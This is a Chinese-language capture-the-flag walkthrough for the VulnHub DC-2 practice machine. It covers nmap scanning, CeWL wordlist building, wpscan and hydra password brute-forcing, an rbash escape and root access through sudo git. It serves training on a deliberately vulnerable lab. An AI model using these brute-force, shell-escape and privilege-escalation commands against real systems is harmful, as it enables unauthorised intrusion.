靶机地址
https://www.vulnhub.com/entry/dc-2,311/
打开靶机,设置为同一种nat模式
kali 信息收集主机发现
arp-scan -l
nmap扫描目标ip 192.168.1.132
nmap -sS -Pn -A -n -p- 192.168.1.132
发现80端口开放,访问网址,发现无法访问
无法访问,可能是域名解析失败,在/etc/hosts更改域名和ip
登录网站信息收集,发现flag
根据分析页面分析,需要cewl爬取
cewl是一个 ruby 应用,爬行指定url的指定深度。也可以跟一个外部链接,结果会返回一个单词列表,这个列表可以扔到John the ripper工具里进行密码破解。cewl还有一个相关的命令行 工具 应用FAB,它使用相同的元数据提取技术从已下载的列表中创建作者/创建者列表。
目录扫描 wpscan
wpscan --url dc-2 -e u 扫描账号
发现三个用户 admin, jerry,tom 创建用户字典
工具生成cewl密码字典
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
工具wpscan 暴力破解账号密码
wpscan --url http://dc-2 -U use.list -P pwd.dic
成功爆破tom,Jerry密码
发现flag2 ,需要切换切入点
切换端口7744 ssh服务,工具hydra对已知的账号,对应字典破解
账号密码:tom parturient
账号登录ssh
ssh tom@192.168.1.132 -p 7744
发现查看flag3.txt时权限受阻,-rbash
绕过rbash,拿到flag3.txt
BASH_CMDS[a]=/bin/sh;a 注:把/bin/bash给a变量`
export PATH=$PATH:/bin/ 注:将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin 注:将/usr/bin作为PATH环境变量导出
切换用户su Jerry ,尝试用web端爆破的密码,发现无法访问flag4.txt
git 提权
输入如下命令,会强制进入交互状态
sudo git -p --help
调用bash
!/bin/bash
参考链接
https://blog.csdn.net/weixin_43705814/article/details/111879362
https://blog.csdn.net/weixin_43870289/article/details/104125681
链接
https://blog.csdn.net/weixin_43705814/article/details/111879362
https://blog.csdn.net/weixin_43870289/article/details/104125681
https://blog.csdn.net/weixin_44288604/article/details/108032112